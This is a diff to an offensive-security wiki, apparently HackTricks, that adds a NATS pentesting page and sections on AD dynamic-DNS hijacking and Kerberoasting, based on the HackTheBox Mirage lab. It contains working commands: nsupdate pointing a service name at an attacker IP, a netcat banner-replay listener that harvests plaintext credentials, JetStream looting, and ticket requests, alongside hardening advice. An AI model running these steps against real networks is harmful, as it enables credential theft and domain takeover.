HackTheBox Mirage Chaining NFS Leaks, Dynamic DNS Abuse, NAT...

src/SUMMARY.md

@@ -403,6 +403,7 @@
 
 # 👽 Network Services Pentesting
 
+- [4222 Pentesting Nats](network-services-pentesting/4222-pentesting-nats.md)
 - [Pentesting JDWP - Java Debug Wire Protocol](network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md)
 - [Pentesting Printers$$external:http://hacking-printers.net/wiki/index.php/Main_Page$$]()
 - [Pentesting SAP](network-services-pentesting/pentesting-sap.md)

src/network-services-pentesting/4222-pentesting-nats.md

@@ -0,0 +1,97 @@
+# 4222 - Pentesting NATS / JetStream
+
+{{#include ../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**NATS** is a high-performance message bus that speaks a simple text-based protocol: the server transmits an `INFO { ... }` JSON banner immediately after TCP connect, and the client replies with a `CONNECT {"user":"USERNAME","pass":"PASSWORD",...}` frame followed by optional `PING`/`PUB`/`SUB` commands. JetStream adds persistence primitives (Streams & Consumers) on top of the same TCP port (`4222/tcp`). TLS and authentication are optional, so many internal deployments run **plaintext AUTH**.
+
+* Default port: **4222/tcp** (4223+ for clustered routes)
+* Stock banner fields: `"version"`, `"auth_required"`, `"jetstream"`, `"max_payload"`, `"tls_required"`
+
+## Enumeration
+
+### Banner grabbing / service probes
+
+```bash
+nmap -p4222 -sV --script banner TARGET
+# Sample output
+# 4222/tcp open  nats  NATS.io gnatsd 2.11.3
+# | banner: INFO {"server_id":"NDo...","version":"2.11.3","proto":1,"auth_required":true,"jetstream":true,"max_payload":1048576}
+```
+
+The INFO frame can also be pulled manually:
+
+```bash
+echo | nc HOST 4222
+INFO {"server_id":"NCLWJ...","version":"2.11.3","auth_required":true,"jetstream":true}
+-ERR 'Authorization Violation'
+```
+
+Install the official CLI (Go ≥1.21) for deeper interaction:
+
+```bash
+go install github.com/nats-io/natscli/nats@latest
+nats -s nats://HOST:4222 rtt
+```
+
+Authentication failures immediately raise `nats: Authorization Violation`, so valid creds are required for any meaningful RPC.
+
+## Credential capture via DNS/service impersonation
+
++ Identify stale AD DNS entries for the broker hostname (e.g. `nats-svc.domain.local`). If the record returns `NXDOMAIN`, a low-privileged domain user can recreate it thanks to default dynamic-update ACLs. See [AD DNS Records abuse](../windows-hardening/active-directory-methodology/ad-dns-records.md) for background.
++ Register the hostname to an attacker-controlled IP:
+
+```bash
+nsupdate
+> server DC_IP
+> update add nats-svc.domain.local 60 A ATTACKER_IP
+> send
+```
+
++ Mirror the legitimate banner once, then replay it to every connecting client. NATS trusts the first `INFO` line it sees, so we only need to pipe it through a listener:
+
+```bash
+nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
+```
+
++ As soon as an internal client resolves the hijacked name, it will emit a plaintext `CONNECT` frame containing the `user` / `pass` pair and various telemetry (client name, Go version, protocol level). Because nothing past the INFO banner is required, even `nc` is enough to harvest secrets.
++ For longer engagements, run the official server locally (`git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V`). TRACE logging already shows usernames; removing the redaction helper or sniffing traffic with Wireshark reveals the full password.
+
+## JetStream looting & password hunting
+
+Once any credential is recovered (e.g. `Dev_Account_A`), store it as a CLI context to avoid retyping:
+
+```bash
+nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
+```
+
+JetStream discovery usually follows this pattern:
+
+```bash
+nats account info --context mirage      # quotas, stream count, expiration
+nats stream list --context mirage       # names + message totals
+nats stream info auth_logs --context mirage
+nats stream view auth_logs --context mirage
+```
+
+Streaming teams frequently log authentication events into subjects such as `logs.auth`. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords:
+
+```json
+{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
+```
+
+Retained secrets can then be replayed against Kerberos-only services using `netexec smb DC01 -u USER -p PASS -k`, enabling full domain compromise.
+
+## Hardening & detection
+
+* **Enforce TLS** (`tls`, `tls_required`, or mTLS via `nkey`/`creds`). Without encryption, INFO/CONNECT leaks credentials to anyone on-path.
+* **Pinpoint who can update DNS** – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed.
+* **Disable credential logging**. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and apply `deny_delete=false` only to trusted operators.
+* **Monitor for banner anomalies** – repeated short-lived connections, authentication timeouts, or INFO banners that do not match the blessed template suggest spoofed servers.
+
+## References
+
+* [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html)
+
+{{#include ../banners/hacktricks-training.md}}

src/network-services-pentesting/5671-5672-pentesting-amqp.md

@@ -24,7 +24,7 @@ PORT     STATE SERVICE VERSION
 ```python
 import amqp
 #By default it uses default credentials "guest":"guest"
-conn = amqp.connection.Connection(host="<IP>", port=5672, virtual_host="/")
+conn = amqp.connection.Connection(host="IP", port=5672, virtual_host="/")
 conn.connect()
 for k, v in conn.server_properties.items():
     print(k, v)
@@ -33,7 +33,7 @@ for k, v in conn.server_properties.items():
 ### Automatic
 
 ```bash
-nmap -sV -Pn -n -T4 -p 5672 --script amqp-info <IP>
+nmap -sV -Pn -n -T4 -p 5672 --script amqp-info IP
 
 PORT     STATE SERVICE VERSION
 5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)
@@ -72,10 +72,21 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin
 - 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and is allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See [networking guide](https://www.rabbitmq.com/networking.html) for details.
 - 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS (only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled). Less than 10 devices with this port open and mostly UDP for DHT nodes.
 
+## See also
+
+{{#ref}}
+4222-pentesting-nats.md
+{{#endref}}
+
 ## Shodan
 
 - `AMQP`
 
+## References
+
+- [CloudAMQP – RabbitMQ for beginners](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
+- [RabbitMQ Networking Guide](https://www.rabbitmq.com/networking.html)
+
 {{#include ../banners/hacktricks-training.md}}
 
 

src/windows-hardening/active-directory-methodology/ad-dns-records.md

@@ -72,6 +72,40 @@ bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10.
 
 ---
 
+### Internal service hijacking via stale dynamic records (NATS case study)
+
+When dynamic updates stay open to all authenticated users, **a de-registered service name can be re-claimed and pointed to attacker infrastructure**. The Mirage HTB DC exposed the hostname `nats-svc.mirage.htb` after DNS scavenging, so any low-privileged user could:
+
+1. **Confirm the record is missing** and learn the SOA with `dig`:
+
+```bash
+dig @dc01.mirage.htb nats-svc.mirage.htb
+```
+
+2. **Re-create the record** toward an external/VPN interface they control:
+
+```bash
+nsupdate
+> server 10.10.11.78
+> update add nats-svc.mirage.htb 300 A 10.10.14.2
+> send
+```
+
+3. **Impersonate the plaintext service**. NATS clients expect to see one `INFO { ... }` banner before they send credentials, so copying a legitimate banner from the real broker is enough to harvest secrets:
+
+```bash
+# Capture a single INFO line from the real service and replay it to victims
+nc 10.10.11.78 4222 | head -1 | nc -lnvp 4222
+```
+
+Any client that resolves the hijacked name will immediately leak its JSON `CONNECT` frame (including `"user"`/`"pass"`) to the listener. Running the official `nats-server -V` binary on the attacker host, disabling its log redaction, or just sniffing the session with Wireshark yields the same plaintext credentials because TLS was optional.
+
+4. **Pivot with the captured creds** – in Mirage the stolen NATS account provided JetStream access, which exposed historic authentication events containing reusable AD usernames/passwords.
+
+This pattern applies to every AD-integrated service that relies on unsecured TCP handshakes (HTTP APIs, RPC, MQTT, etc.): once the DNS record is hijacked, the attacker becomes the service.
+
+---
+
 ## Detection & hardening
 
 * Deny **Authenticated Users** the *Create all child objects* right on sensitive zones and delegate dynamic updates to a dedicated account used by DHCP.
@@ -84,6 +118,7 @@ bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10.
 
 ## References
 
-* Kevin Robertson – “ADIDNS Revisited – WPAD, GQBL and More”  (2018, still the de-facto reference for wildcard/WPAD attacks)  
-* Akamai – “Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates” (Dec 2023)
+- Kevin Robertson – “ADIDNS Revisited – WPAD, GQBL and More”  (2018, still the de-facto reference for wildcard/WPAD attacks)  
+- Akamai – “Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates” (Dec 2023)
+- [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html)
 {{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/bloodhound.md

@@ -67,6 +67,28 @@ The collectors generate JSON which is ingested via the BloodHound GUI.
 
 ---
 
+## Prioritising Kerberoasting with BloodHound
+
+Graph context is vital to avoid noisy, indiscriminate roasting. A lightweight workflow:
+
+1. **Collect everything once** using an ADWS-compatible collector (e.g. RustHound-CE) so you can work offline and rehearse paths without touching the DC again:
+
+```bash
+rusthound-ce -d corp.local -u svc.collector -p 'Passw0rd!' -c All -z
+```
+
+2. **Import the ZIP, mark the compromised principal as owned**, then run built-in queries such as *Kerberoastable Users* and *Shortest Paths to Domain Admins*. This instantly highlights SPN-bearing accounts with useful group memberships (Exchange, IT, tier0 service accounts, etc.).
+3. **Prioritise by blast radius** – focus on SPNs that control shared infrastructure or have admin rights, and check `pwdLastSet`, `lastLogon`, and allowed encryption types before spending cracking cycles.
+4. **Request only the tickets you care about**. Tools like NetExec can target selected `sAMAccountName`s so that each LDAP ROAST request has a clear justification:
+
+```bash
+netexec ldap dc01.corp.local -u svc.collector -p 'Passw0rd!' --kerberoasting kerberoast.txt --spn svc-sql
+```
+
+5. **Crack offline**, then immediately re-query BloodHound to plan post-exploitation with the new privileges.
+
+This approach keeps the signal-to-noise ratio high, reduces detectable volume (no mass SPN requests), and ensures that every cracked ticket translates to meaningful privilege escalation steps.
+
 ## Group3r
 
 [Group3r](https://github.com/Group3r/Group3r) enumerates **Group Policy Objects** and highlights misconfigurations.
@@ -86,4 +108,9 @@ Group3r.exe -f gpo.log   # -s to stdout
 PingCastle.exe --healthcheck --server corp.local --user bob --password "P@ssw0rd!"
 ```
 
+## References
+
+- [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html)
+- [RustHound-CE](https://github.com/g0h4n/RustHound-CE)
+
 {{#include ../../banners/hacktricks-training.md}}